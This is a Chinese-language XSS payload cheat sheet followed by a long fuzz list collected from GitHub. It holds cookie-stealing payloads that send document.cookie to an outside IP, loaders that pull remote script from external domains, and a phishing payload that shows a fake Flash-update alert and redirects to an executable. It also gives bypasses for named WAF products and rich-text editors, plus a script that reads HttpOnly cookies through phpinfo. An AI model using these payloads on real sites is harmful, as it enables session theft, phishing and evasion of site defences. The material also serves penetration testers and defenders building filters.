复制代码

1.8 收集的不同情况下的XSS Payload

先附两个github的字典链接:

https://github.com/TheKingOfDuck/fuzzDicts

https://github.com/gh0stkey/Web-Fuzzing-Box

 

本篇主要针对不同的情况给出不一样的xss payload:

常见的xss payoad

弹窗

<script>alert(1)</script>
<script>prompt(2)</script>
<script>confirm(3)</script>
<script>console.log(3)</script>
<script>document.write(1)</script>

当不能弹窗的时候,可以用下面的payload来证明

<script>console.log(3)</script>
<script>document.write(1)</script>

引入外部js,可能需要短域名

<script src=//xsshs.cn></script>
<img src onerror=appendChild(createElement("script")).src="//xsshs.cn/aaaa">
<img src onerror=jQuery.getScript("//xsshs.cn/aaaa")>

盗取cookie

<script>window.location.href="http://2.2.2.2/?msg="+escape(document.cookie)</script>
<script>document.body.appendChild(document.createElement("img")).src="http://2.2.2.2/?msg="+escape(document.cookie)</script>

结合弹窗和url跳转进行钓鱼

<script>alert("您的flash版本过低,请更新您的flash版本"); window.location.href ="https://www.flash.cn/cdm/latest/flashplayer_install_cn.exe"</script>

不同位置的xss

当xss的触发位置在标签外

name=<script>alert(1)</script>

标签内

name="><script>alert(1)</script>
name=1" id=javascript:alert(1) autofocus onfocus=location=this.id xx="

在href=中

name=javascript:alert(1)

在js中

name=</script><script>alert(1)</script>
name=';alert(1)//
name='-alert(1)-'
name=';};alert(1);function a(){a='

在xml中

<?xml version="1.0"?><a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(/XSS/)'></a>
<?xml version="1.0"?><html:html xmlns:html='http://www.w3.org/1999/xhtml'><html:script>alert(1);</html:script></html:html>

svg

<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" id="Layer_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px" width="100px" height="100px" viewBox="0 0 751 751" enable-background="new 0 0 751 751" xml:space="preserve">  <image id="image0" width="751" height="751" x="0" y="0"
    href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAu8AAALvCAIAAABa4bwGAAAAIGNIUk0AAHomAACAhAAA+gAAAIDo" />
<script>alert(1)</script>
</svg>

绕过相关

当过滤了圆括号

<script>alert`1`</script>
<video src onerror=a="%2",location="javascript:aler"+"t"+a+"81"+a+"9">
<video src onerror="javascript:window.onerror=alert;throw 1">

当过滤了空格

假设payload如下: 

html><imgAAsrcAAonerrorBB=BBalertCC(1)DD</html> 

A位置可填充/,/123/,%09,%0A,%0C,%0D,%20 

B位置可填充%09,%0A,%0C,%0D,%20 

C位置可填充%0B,如果加双引号,则可以填充/**/,%09,%0A ,%0C,%0D,%20 

D位置可填充%09,%0A,%0C,%0D,%20//,>

函数配合拼接

<video/src/onerror=top.alert(1);>
<video/src/onerror=top[`al`+`ert`](1);>
<video/src/onerror=self[`al`+`ert`](1);>
<video/src/onerror=parent[`al`+`ert`](1);>
<video/src/onerror=window[`al`+`ert`](1);>
<video/src/onerror=frames[`al`+`ert`](1);>
<video/src/onerror=content[`al`+`ert`](1);>
<body/onload=eval(alert(1));>
<body/onload=eval(`al`+`ert(1)`);>
<body/onload=open(alert(1));>
<body/onload=document.write(alert(1));>
<body/onload=setTimeout(alert(1));>
<body/onload=setInterval(alert(1));>
<body/onload=Set.constructor(alert(1))()>
<body/onload=Map.constructor(alert(1))()>
<body/onload=Array.constructor(alert(1))()>
<body/onload=WeakSet.constructor(alert(1))()>
<body/onload=constructor.constructor(alert(1))>
<video/src/onerror=[1].map(alert);>
<video/src/onerror=[1].map(eval('al'+'ert'));>
<video/src/onerror=[1].find(alert);>
<video/src/onerror=[1].every(alert);>
<video/src/onerror=[1].filter(alert);>
<video/src/onerror=[1].forEach(alert);>
<video/src/onerror=[1].findIndex(alert);>

赋值和拼接

<img src onerror=_=alert,_(1)>
<img src alt=al lang=ert onerror=top[alt+lang](1)>
<img src onerror=top[a='al',b='ev',b+a]('alert(1)')>
<img src onerror=['ale'+'rt'].map(top['ev'+'al'])[0]['valu'+'eOf']()(1)>

创建匿名函数

<video/src/onerror=Function('ale'+'rt(1)')();>

伪协议

<svg/onload=javascript:alert(1)>
<iframe src=javascript:alert(1)>
<form action=javascript:alert(1)><input type=submit>
<a href=javascript:alert(123);>xss</a>
<iframe src=data:text/html;base64,PHNjcmlwdD5hbGVydCgneHNzJyk8L3NjcmlwdD4=>
<object data=data:text/html;base64,PHNjcmlwdD5hbGVydCgneHNzJyk8L3NjcmlwdD4=></object>
<embed src=data:text/html;base64,PHNjcmlwdD5hbGVydCgiWFNTIik7PC9zY3JpcHQ+>
<embed src="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hsaW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAwIiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==">

WAF绕过

安全狗

http://www.safedog.cn/index/privateSolutionIndex.html?tab=2<video/src/onerror=top[`al`%2B`ert`](1);>
http://www.safedog.cn/index/privateSolutionIndex.html?tab=2<video/src/onerror=appendChild(createElement("script")).src="//z.cn">

D盾

http://www.d99net.net/News.asp?id=126<video/src/onloadstart=top[`al`%2B`ert`](1);>
http://www.d99net.net/News.asp?id=126<video/src/onloadstart=top[a='al',b='ev',b%2ba](appendChild(createElement(`script`)).src=`//z.cn`);>

云锁+奇安信waf

http://www.yunsuo.com.cn/ht/dynamic/20190903/259.html?id=1<video/src/onloadstart=top[`al`%2B`ert`](1);>
http://www.yunsuo.com.cn/ht/dynamic/20190903/259.html?id=1<video/src/onloadstart=top[a='al',b='ev',b%2ba](appendChild(createElement(`script`)).src=`//z.cn`);>

富文本xss

富文本编辑器允许html标签,允许以html模式编辑,往往过滤了绝大部分有害标签

Ueditor

白名单过滤,只允许部分标签和部分元素:http://ueditor.baidu.com/ueditor/ueditor.config.js

但是可以用超链接带入javascript 

<a href=javascript:alert(123);>xss</a>

UMeditor

和Ueditor差不多,但是超链接会强制以http开头。

查看源代码,发现以下两个jsp文件存在反射XSS

/umeditor/jsp/getContent.jsp?myEditor=<script>alert(1)</script>
/umeditor/jsp/imageUp.jsp?callback=</script><script>alert(1)</script>

Kindeditor

Kindeditor采用黑名单正则过滤,效率不高,很容易被绕过:http://kindeditor.net/ke4/kindeditor-all.js?t=20160331.js

最简单的是使用iframe标签绕过

<iframe/src=javascript:alert(58);></iframe>

phpinfo绕过http-only

phpinfo还可以用于探测http-only的cookie

原理为在有xss的页面,发起一个xhr请求,然后js读取返回页面中用正则匹配出HTTP_COOKIE的字段。

<script>
function createXmlHttp() {
    if (window.XMLHttpRequest) {
       xmlHttp = new XMLHttpRequest();               
    } else {
       xmlHttp = new ActiveXObject("Microsoft.XMLHTTP");
    }
}
function getS() {
    var Url = 'http://127.0.0.1:81/phpinfo.php';
    createXmlHttp();
    xmlHttp.onreadystatechange = writeS;
    xmlHttp.open("GET", Url, true);
    xmlHttp.send(null);
}
function writeS() {
    if (xmlHttp.readyState == 4) {
     var x = xmlHttp.responseText.match(/HTTP_COOKIE.+?<\/td><td.+?>([\w\W]+?)<\/td>/);
alert(x);   
    }
}
getS();
</script>

看到的一些新奇的xss payload

<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
<BODY BACKGROUND="javascript:alert('XSS')">
<input onfocus=alert(1) autofocus>
<h1 onmousemove="alert(1)">title</h1>
<select onfocus=alert(1) autofocus>
<iframe src="vbscript:msgbox(1)"></iframe> 
<iframe src="javascript:alert(1)"></iframe>
<iframe src="vbscript:msgbox(1)"></iframe>
<iframe onload=alert(1)></iframe>
<iframe src="data:text/html,<script>alert(0)</script>"></iframe> 
<iframe src="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></iframe> 
</iframe><iframe src="vbscript:msgbox(1)"></iframe>
</iframe><iframe src="data:text/html,<script>alert(0)</script>"></iframe>
<details open ontoggle=prompt(/xss/)>
<plaintext/onmouseover=prompt(1)>
javascript://comment%250aalert(1) 
<img src=x onerror=confirm(1)>
<video><source onerror=alert(1)>
<audio src=x onerror="alert(1)">
<body onload=alert(1)>
<body onscroll=alert(1);><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><input autofocus>
<textarea onfocus=alert(1) autofocus>

Github收集XSS Payload汇总

<script\x20type="text/javascript">javascript:alert(1);</script>
<script\x3Etype="text/javascript">javascript:alert(2);</script>
<script\x0Dtype="text/javascript">javascript:alert(3);</script>
<script\x09type="text/javascript">javascript:alert(4);</script>
<script\x0Ctype="text/javascript">javascript:alert(5);</script>
<script\x2Ftype="text/javascript">javascript:alert(6);</script>
<script\x0Atype="text/javascript">javascript:alert(7);</script>
'`"><\x3Cscript>javascript:alert(8)</script>
'`"><\x00script>javascript:alert(9)</script>
<img src=10 href=10 onerror="javascript:alert(10)"></img>
<audio src=11 href=11 onerror="javascript:alert(11)"></audio>
<video src=12 href=12 onerror="javascript:alert(12)"></video>
<body src=13 href=13 onerror="javascript:alert(13)"></body>
<image src=14 href=14 onerror="javascript:alert(14)"></image>
<object src=15 href=15 onerror="javascript:alert(15)"></object>
<script src=16 href=16 onerror="javascript:alert(16)"></script>
<svg onResize svg onResize="javascript:javascript:alert(17)"></svg onResize>
<title onPropertyChange title onPropertyChange="javascript:javascript:alert(18)"></title onPropertyChange>
<iframe onLoad iframe onLoad="javascript:javascript:alert(19)"></iframe onLoad>
<body onMouseEnter body onMouseEnter="javascript:javascript:alert(20)"></body onMouseEnter>
<body onFocus body onFocus="javascript:javascript:alert(21)"></body onFocus>
<frameset onScroll frameset onScroll="javascript:javascript:alert(22)"></frameset onScroll>
<script onReadyStateChange script onReadyStateChange="javascript:javascript:alert(23)"></script onReadyStateChange>
<html onMouseUp html onMouseUp="javascript:javascript:alert(24)"></html onMouseUp>
<body onPropertyChange body onPropertyChange="javascript:javascript:alert(25)"></body onPropertyChange>
<svg onLoad svg onLoad="javascript:javascript:alert(26)"></svg onLoad>
<body onPageHide body onPageHide="javascript:javascript:alert(27)"></body onPageHide>
<body onMouseOver body onMouseOver="javascript:javascript:alert(28)"></body onMouseOver>
<body onUnload body onUnload="javascript:javascript:alert(29)"></body onUnload>
<body onLoad body onLoad="javascript:javascript:alert(30)"></body onLoad>
<bgsound onPropertyChange bgsound onPropertyChange="javascript:javascript:alert(31)"></bgsound onPropertyChange>
<html onMouseLeave html onMouseLeave="javascript:javascript:alert(32)"></html onMouseLeave>
<html onMouseWheel html onMouseWheel="javascript:javascript:alert(33)"></html onMouseWheel>
<style onLoad style onLoad="javascript:javascript:alert(34)"></style onLoad>
<iframe onReadyStateChange iframe onReadyStateChange="javascript:javascript:alert(35)"></iframe onReadyStateChange>
<body onPageShow body onPageShow="javascript:javascript:alert(36)"></body onPageShow>
<style onReadyStateChange style onReadyStateChange="javascript:javascript:alert(37)"></style onReadyStateChange>
<frameset onFocus frameset onFocus="javascript:javascript:alert(38)"></frameset onFocus>
<applet onError applet onError="javascript:javascript:alert(39)"></applet onError>
<marquee onStart marquee onStart="javascript:javascript:alert(40)"></marquee onStart>
<script onLoad script onLoad="javascript:javascript:alert(41)"></script onLoad>
<html onMouseOver html onMouseOver="javascript:javascript:alert(42)"></html onMouseOver>
<html onMouseEnter html onMouseEnter="javascript:parent.javascript:alert(43)"></html onMouseEnter>
<body onBeforeUnload body onBeforeUnload="javascript:javascript:alert(44)"></body onBeforeUnload>
<html onMouseDown html onMouseDown="javascript:javascript:alert(45)"></html onMouseDown>
<marquee onScroll marquee onScroll="javascript:javascript:alert(46)"></marquee onScroll>
<xml onPropertyChange xml onPropertyChange="javascript:javascript:alert(47)"></xml onPropertyChange>
<frameset onBlur frameset onBlur="javascript:javascript:alert(48)"></frameset onBlur>
<applet onReadyStateChange applet onReadyStateChange="javascript:javascript:alert(49)"></applet onReadyStateChange>
<svg onUnload svg onUnload="javascript:javascript:alert(50)"></svg onUnload>
<html onMouseOut html onMouseOut="javascript:javascript:alert(51)"></html onMouseOut>
<body onMouseMove body onMouseMove="javascript:javascript:alert(52)"></body onMouseMove>
<body onResize body onResize="javascript:javascript:alert(53)"></body onResize>
<object onError object onError="javascript:javascript:alert(54)"></object onError>
<body onPopState body onPopState="javascript:javascript:alert(55)"></body onPopState>
<html onMouseMove html onMouseMove="javascript:javascript:alert(56)"></html onMouseMove>
<applet onreadystatechange applet onreadystatechange="javascript:javascript:alert(57)"></applet onreadystatechange>
<body onpagehide body onpagehide="javascript:javascript:alert(58)"></body onpagehide>
<svg onunload svg onunload="javascript:javascript:alert(59)"></svg onunload>
<applet onerror applet onerror="javascript:javascript:alert(60)"></applet onerror>
<body onkeyup body onkeyup="javascript:javascript:alert(61)"></body onkeyup>
<body onunload body onunload="javascript:javascript:alert(62)"></body onunload>
<iframe onload iframe onload="javascript:javascript:alert(63)"></iframe onload>
<body onload body onload="javascript:javascript:alert(64)"></body onload>
<html onmouseover html onmouseover="javascript:javascript:alert(65)"></html onmouseover>
<object onbeforeload object onbeforeload="javascript:javascript:alert(66)"></object onbeforeload>
<body onbeforeunload body onbeforeunload="javascript:javascript:alert(67)"></body onbeforeunload>
<body onfocus body onfocus="javascript:javascript:alert(68)"></body onfocus>
<body onkeydown body onkeydown="javascript:javascript:alert(69)"></body onkeydown>
<iframe onbeforeload iframe onbeforeload="javascript:javascript:alert(70)"></iframe onbeforeload>
<iframe src iframe src="javascript:javascript:alert(71)"></iframe src>
<svg onload svg onload="javascript:javascript:alert(72)"></svg onload>
<html onmousemove html onmousemove="javascript:javascript:alert(73)"></html onmousemove>
<body onblur body onblur="javascript:javascript:alert(74)"></body onblur>
\x3Cscript>javascript:alert(75)</script>
'"`><script>/* *\x2Fjavascript:alert(76)// */</script>
<script>javascript:alert(77)</script\x0D
<script>javascript:alert(78)</script\x0A
<script>javascript:alert(79)</script\x0B
<script charset="\x22>javascript:alert(80)</script>
<!--\x3E<img src=xxx:x onerror=javascript:alert(81)> -->
--><!-- ---> <img src=xxx:x onerror=javascript:alert(82)> -->
--><!-- --\x00> <img src=xxx:x onerror=javascript:alert(83)> -->
--><!-- --\x284> <img src=xxx:x onerror=javascript:alert(84)> -->
--><!-- --\x3E> <img src=xxx:x onerror=javascript:alert(85)> -->
`"'><img src='#\x27 onerror=javascript:alert(86)>
<a href="javascript\x3Ajavascript:alert(87)" id="fuzzelement87">test</a>
"'`><p><svg><script>a='hello\x27;javascript:alert(88)//';</script></p>
<a href="javas\x00cript:javascript:alert(89)" id="fuzzelement89">test</a>
<a href="javas\x07cript:javascript:alert(90)" id="fuzzelement90">test</a>
<a href="javas\x0Dcript:javascript:alert(91)" id="fuzzelement91">test</a>
<a href="javas\x0Acript:javascript:alert(92)" id="fuzzelement92">test</a>
<a href="javas\x08cript:javascript:alert(93)" id="fuzzelement93">test</a>
<a href="javas\x02cript:javascript:alert(94)" id="fuzzelement94">test</a>
<a href="javas\x03cript:javascript:alert(95)" id="fuzzelement95">test</a>
<a href="javas\x04cript:javascript:alert(96)" id="fuzzelement96">test</a>
<a href="javas\x097cript:javascript:alert(97)" id="fuzzelement97">test</a>
<a href="javas\x05cript:javascript:alert(98)" id="fuzzelement98">test</a>
<a href="javas\x0Bcript:javascript:alert(99)" id="fuzzelement99">test</a>
<a href="javas\x09cript:javascript:alert(100)" id="fuzzelement100">test</a>
<a href="javas\x06cript:javascript:alert(101)" id="fuzzelement101">test</a>
<a href="javas\x0Ccript:javascript:alert(102)" id="fuzzelement102">test</a>
<script>/* *\x2A/javascript:alert(103)// */</script>
<script>/* *\x00/javascript:alert(104)// */</script>
<style></style\x3E<img src="about:blank" onerror=javascript:alert(105)//></style>
<style></style\x0D<img src="about:blank" onerror=javascript:alert(106)//></style>
<style></style\x09<img src="about:blank" onerror=javascript:alert(107)//></style>
<style></style\x20<img src="about:blank" onerror=javascript:alert(108)//></style>
<style></style\x0A<img src="about:blank" onerror=javascript:alert(109)//></style>
"'`>ABC<div style="font-family:'foo'\x7Dx:expression(javascript:alert(110);/*';">DEF
"'`>ABC<div style="font-family:'foo'\x3Bx:expression(javascript:alert(111);/*';">DEF
<script>if("x\\xE112\x96\x89".length==2) { javascript:alert(112);}</script>
<script>if("x\\xE0\xB9\x92".length==2) { javascript:alert(113);}</script>
<script>if("x\\xEE\xA9\x93".length==2) { javascript:alert(114);}</script>
'`"><\x3Cscript>javascript:alert(115)</script>
'`"><\x00script>javascript:alert(116)</script>
"'`><\x3Cimg src=xxx:x onerror=javascript:alert(117)>
"'`><\x00img src=xxx:x onerror=javascript:alert(118)>
<script src="data:text/plain\x2Cjavascript:alert(119)"></script>
<script src="data:\xD4\x8F,javascript:alert(120)"></script>
<script src="data:\xE0\xA4\x98,javascript:alert(121)"></script>
<script src="data:\xCB\x8F,javascript:alert(122)"></script>
<script\x20type="text/javascript">javascript:alert(123);</script>
<script\x3Etype="text/javascript">javascript:alert(124);</script>
<script\x0Dtype="text/javascript">javascript:alert(125);</script>
<script\x09type="text/javascript">javascript:alert(126);</script>
<script\x0Ctype="text/javascript">javascript:alert(127);</script>
<script\x2Ftype="text/javascript">javascript:alert(128);</script>
<script\x0Atype="text/javascript">javascript:alert(129);</script>
ABC<div style="x\x3Aexpression(javascript:alert(130)">DEF
ABC<div style="x:expression\x5C(javascript:alert(131)">DEF
ABC<div style="x:expression\x00(javascript:alert(132)">DEF
ABC<div style="x:exp\x00ression(javascript:alert(133)">DEF
ABC<div style="x:exp\x5Cression(javascript:alert(134)">DEF
ABC<div style="x:\x0Aexpression(javascript:alert(135)">DEF
ABC<div style="x:\x09expression(javascript:alert(136)">DEF
ABC<div style="x:\xE3\x80\x80expression(javascript:alert(137)">DEF
ABC<div style="x:\xE2\x80\x84expression(javascript:alert(138)">DEF
ABC<div style="x:\xC2\xA0expression(javascript:alert(139)">DEF
ABC<div style="x:\xE2\x80\x80expression(javascript:alert(140)">DEF
ABC<div style="x:\xE2\x80\x8Aexpression(javascript:alert(141)">DEF
ABC<div style="x:\x0Dexpression(javascript:alert(142)">DEF
ABC<div style="x:\x0Cexpression(javascript:alert(143)">DEF
ABC<div style="x:\xE2\x80\x87expression(javascript:alert(144)">DEF
ABC<div style="x:\xEF\xBB\xBFexpression(javascript:alert(145)">DEF
ABC<div style="x:\x20expression(javascript:alert(146)">DEF
ABC<div style="x:\xE2\x80\x88expression(javascript:alert(147)">DEF
ABC<div style="x:\x00expression(javascript:alert(148)">DEF
ABC<div style="x:\xE2\x80\x8Bexpression(javascript:alert(149)">DEF
ABC<div style="x:\xE2\x80\x86expression(javascript:alert(150)">DEF
ABC<div style="x:\xE2\x80\x85expression(javascript:alert(151)">DEF
ABC<div style="x:\xE2\x80\x82expression(javascript:alert(152)">DEF
ABC<div style="x:\x0Bexpression(javascript:alert(153)">DEF
ABC<div style="x:\xE2\x80\x8154expression(javascript:alert(154)">DEF
ABC<div style="x:\xE2\x80\x83expression(javascript:alert(155)">DEF
ABC<div style="x:\xE2\x80\x89expression(javascript:alert(156)">DEF
<a href="\x0Bjavascript:javascript:alert(157)" id="fuzzelement157">test</a>
<a href="\x0Fjavascript:javascript:alert(158)" id="fuzzelement158">test</a>
<a href="\xC2\xA0javascript:javascript:alert(159)" id="fuzzelement159">test</a>
<a href="\x05javascript:javascript:alert(160)" id="fuzzelement160">test</a>
<a href="\xE161\xA0\x8Ejavascript:javascript:alert(161)" id="fuzzelement161">test</a>
<a href="\x1628javascript:javascript:alert(162)" id="fuzzelement162">test</a>
<a href="\x163163javascript:javascript:alert(163)" id="fuzzelement163">test</a>
<a href="\xE2\x80\x88javascript:javascript:alert(164)" id="fuzzelement164">test</a>
<a href="\xE2\x80\x89javascript:javascript:alert(165)" id="fuzzelement165">test</a>
<a href="\xE2\x80\x80javascript:javascript:alert(166)" id="fuzzelement166">test</a>
<a href="\x1677javascript:javascript:alert(167)" id="fuzzelement167">test</a>
<a href="\x03javascript:javascript:alert(168)" id="fuzzelement168">test</a>
<a href="\x0Ejavascript:javascript:alert(169)" id="fuzzelement169">test</a>
<a href="\x170Ajavascript:javascript:alert(170)" id="fuzzelement170">test</a>
<a href="\x00javascript:javascript:alert(171)" id="fuzzelement171">test</a>
<a href="\x1720javascript:javascript:alert(172)" id="fuzzelement172">test</a>
<a href="\xE2\x80\x82javascript:javascript:alert(173)" id="fuzzelement173">test</a>
<a href="\x20javascript:javascript:alert(174)" id="fuzzelement174">test</a>
<a href="\x1753javascript:javascript:alert(175)" id="fuzzelement175">test</a>
<a href="\x09javascript:javascript:alert(176)" id="fuzzelement176">test</a>
<a href="\xE2\x80\x8Ajavascript:javascript:alert(177)" id="fuzzelement177">test</a>
<a href="\x1784javascript:javascript:alert(178)" id="fuzzelement178">test</a>
<a href="\x1799javascript:javascript:alert(179)" id="fuzzelement179">test</a>
<a href="\xE2\x80\xAFjavascript:javascript:alert(180)" id="fuzzelement180">test</a>
<a href="\x181Fjavascript:javascript:alert(181)" id="fuzzelement181">test</a>
<a href="\xE2\x80\x8182javascript:javascript:alert(182)" id="fuzzelement182">test</a>
<a href="\x183Djavascript:javascript:alert(183)" id="fuzzelement183">test</a>
<a href="\xE2\x80\x87javascript:javascript:alert(184)" id="fuzzelement184">test</a>
<a href="\x07javascript:javascript:alert(185)" id="fuzzelement185">test</a>
<a href="\xE186\x9A\x80javascript:javascript:alert(186)" id="fuzzelement186">test</a>
<a href="\xE2\x80\x83javascript:javascript:alert(187)" id="fuzzelement187">test</a>
<a href="\x04javascript:javascript:alert(188)" id="fuzzelement188">test</a>
<a href="\x0189javascript:javascript:alert(189)" id="fuzzelement189">test</a>
<a href="\x08javascript:javascript:alert(190)" id="fuzzelement190">test</a>
<a href="\xE2\x80\x84javascript:javascript:alert(191)" id="fuzzelement191">test</a>
<a href="\xE2\x80\x86javascript:javascript:alert(192)" id="fuzzelement192">test</a>
<a href="\xE3\x80\x80javascript:javascript:alert(193)" id="fuzzelement193">test</a>
<a href="\x1942javascript:javascript:alert(194)" id="fuzzelement194">test</a>
<a href="\x0Djavascript:javascript:alert(195)" id="fuzzelement195">test</a>
<a href="\x0Ajavascript:javascript:alert(196)" id="fuzzelement196">test</a>
<a href="\x0Cjavascript:javascript:alert(197)" id="fuzzelement197">test</a>
<a href="\x1985javascript:javascript:alert(198)" id="fuzzelement198">test</a>
<a href="\xE2\x80\xA8javascript:javascript:alert(199)" id="fuzzelement199">test</a>
<a href="\x2006javascript:javascript:alert(200)" id="fuzzelement200">test</a>
<a href="\x02javascript:javascript:alert(201)" id="fuzzelement201">test</a>
<a href="\x202Bjavascript:javascript:alert(202)" id="fuzzelement202">test</a>
<a href="\x06javascript:javascript:alert(203)" id="fuzzelement203">test</a>
<a href="\xE2\x80\xA9javascript:javascript:alert(204)" id="fuzzelement204">test</a>
<a href="\xE2\x80\x85javascript:javascript:alert(205)" id="fuzzelement205">test</a>
<a href="\x206Ejavascript:javascript:alert(206)" id="fuzzelement206">test</a>
<a href="\xE2\x8207\x9Fjavascript:javascript:alert(207)" id="fuzzelement207">test</a>
<a href="\x208Cjavascript:javascript:alert(208)" id="fuzzelement208">test</a>
<a href="javascript\x00:javascript:alert(209)" id="fuzzelement209">test</a>
<a href="javascript\x3A:javascript:alert(210)" id="fuzzelement210">test</a>
<a href="javascript\x09:javascript:alert(211)" id="fuzzelement211">test</a>
<a href="javascript\x0D:javascript:alert(212)" id="fuzzelement212">test</a>
<a href="javascript\x0A:javascript:alert(213)" id="fuzzelement213">test</a>
`"'><img src=xxx:x \x0Aonerror=javascript:alert(214)>
`"'><img src=xxx:x \x22onerror=javascript:alert(215)>
`"'><img src=xxx:x \x0Bonerror=javascript:alert(216)>
`"'><img src=xxx:x \x0Donerror=javascript:alert(217)>
`"'><img src=xxx:x \x2Fonerror=javascript:alert(218)>
`"'><img src=xxx:x \x09onerror=javascript:alert(219)>
`"'><img src=xxx:x \x0Conerror=javascript:alert(220)>
`"'><img src=xxx:x \x00onerror=javascript:alert(221)>
`"'><img src=xxx:x \x27onerror=javascript:alert(222)>
`"'><img src=xxx:x \x20onerror=javascript:alert(223)>
"`'><script>\x3Bjavascript:alert(224)</script>
"`'><script>\x0Djavascript:alert(225)</script>
"`'><script>\xEF\xBB\xBFjavascript:alert(226)</script>
"`'><script>\xE2\x80\x8227javascript:alert(227)</script>
"`'><script>\xE2\x80\x84javascript:alert(228)</script>
"`'><script>\xE3\x80\x80javascript:alert(229)</script>
"`'><script>\x09javascript:alert(230)</script>
"`'><script>\xE2\x80\x89javascript:alert(231)</script>
"`'><script>\xE2\x80\x85javascript:alert(232)</script>
"`'><script>\xE2\x80\x88javascript:alert(233)</script>
"`'><script>\x00javascript:alert(234)</script>
"`'><script>\xE2\x80\xA8javascript:alert(235)</script>
"`'><script>\xE2\x80\x8Ajavascript:alert(236)</script>
"`'><script>\xE237\x9A\x80javascript:alert(237)</script>
"`'><script>\x0Cjavascript:alert(238)</script>
"`'><script>\x2Bjavascript:alert(239)</script>
"`'><script>\xF0\x90\x96\x9Ajavascript:alert(240)</script>
"`'><script>-javascript:alert(241)</script>
"`'><script>\x0Ajavascript:alert(242)</script>
"`'><script>\xE2\x80\xAFjavascript:alert(243)</script>
"`'><script>\x7Ejavascript:alert(244)</script>
"`'><script>\xE2\x80\x87javascript:alert(245)</script>
"`'><script>\xE2\x8246\x9Fjavascript:alert(246)</script>
"`'><script>\xE2\x80\xA9javascript:alert(247)</script>
"`'><script>\xC2\x85javascript:alert(248)</script>
"`'><script>\xEF\xBF\xAEjavascript:alert(249)</script>
"`'><script>\xE2\x80\x83javascript:alert(250)</script>
"`'><script>\xE2\x80\x8Bjavascript:alert(251)</script>
"`'><script>\xEF\xBF\xBEjavascript:alert(252)</script>
"`'><script>\xE2\x80\x80javascript:alert(253)</script>
"`'><script>\x2254javascript:alert(254)</script>
"`'><script>\xE2\x80\x82javascript:alert(255)</script>
"`'><script>\xE2\x80\x86javascript:alert(256)</script>
"`'><script>\xE257\xA0\x8Ejavascript:alert(257)</script>
"`'><script>\x0Bjavascript:alert(258)</script>
"`'><script>\x20javascript:alert(259)</script>
"`'><script>\xC2\xA0javascript:alert(260)</script>
"/><img/onerror=\x0Bjavascript:alert(261)\x0Bsrc=xxx:x />
"/><img/onerror=\x22javascript:alert(262)\x22src=xxx:x />
"/><img/onerror=\x09javascript:alert(263)\x09src=xxx:x />
"/><img/onerror=\x27javascript:alert(264)\x27src=xxx:x />
"/><img/onerror=\x0Ajavascript:alert(265)\x0Asrc=xxx:x />
"/><img/onerror=\x0Cjavascript:alert(266)\x0Csrc=xxx:x />
"/><img/onerror=\x0Djavascript:alert(267)\x0Dsrc=xxx:x />
"/><img/onerror=\x60javascript:alert(268)\x60src=xxx:x />
"/><img/onerror=\x20javascript:alert(269)\x20src=xxx:x />
<script\x2F>javascript:alert(270)</script>
<script\x20>javascript:alert(271)</script>
<script\x0D>javascript:alert(272)</script>
<script\x0A>javascript:alert(273)</script>
<script\x0C>javascript:alert(274)</script>
<script\x00>javascript:alert(275)</script>
<script\x09>javascript:alert(276)</script>
`"'><img src=xxx:x onerror\x0B=javascript:alert(277)>
`"'><img src=xxx:x onerror\x00=javascript:alert(278)>
`"'><img src=xxx:x onerror\x0C=javascript:alert(279)>
`"'><img src=xxx:x onerror\x0D=javascript:alert(280)>
`"'><img src=xxx:x onerror\x20=javascript:alert(281)>
`"'><img src=xxx:x onerror\x0A=javascript:alert(282)>
`"'><img src=xxx:x onerror\x09=javascript:alert(283)>
<script>javascript:alert(284)<\x00/script>
<img src=# onerror\x3D"javascript:alert(285)" >
<input onfocus=javascript:alert(286) autofocus>
<input onblur=javascript:alert(287) autofocus><input autofocus>
<video poster=javascript:javascript:alert(288)//
<body onscroll=javascript:alert(289)><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><input autofocus>
<form id=test onforminput=javascript:alert(290)><input></form><button form=test onformchange=javascript:alert(290)>X
<video><source onerror="javascript:javascript:alert(291)">
<video onerror="javascript:javascript:alert(292)"><source>
<form><button formaction="javascript:javascript:alert(293)">X
<body oninput=javascript:alert(294)><input autofocus>
<math href="javascript:javascript:alert(295)">CLICKME</math>  <math> <maction actiontype="statusline#http://google.com" xlink:href="javascript:javascript:alert(295)">CLICKME</maction> </math>
<frameset onload=javascript:alert(296)>
<table background="javascript:javascript:alert(297)">
<!--<img src="--><img src=x onerror=javascript:alert(298)//">
<comment><img src="</comment><img src=x onerror=javascript:alert(299))//">
<![><img src="]><img src=x onerror=javascript:alert(300)//">
<style><img src="</style><img src=x onerror=javascript:alert(301)//">
<li style=list-style:url() onerror=javascript:alert(302)> <div style=content:url(data:image/svg+xml,%%3Csvg/%%3E);visibility:hidden onload=javascript:alert(302)></div>
<head><base href="javascript://"></head><body><a href="/. /,javascript:alert(303)//#">XXX</a></body>
<SCRIPT FOR=document EVENT=onreadystatechange>javascript:alert(304)</SCRIPT>
<OBJECT CLASSID="clsid:333C7BC4-460F-305305D0-BC04-0080C7055A83"><PARAM NAME="DataURL" VALUE="javascript:alert(305)"></OBJECT>
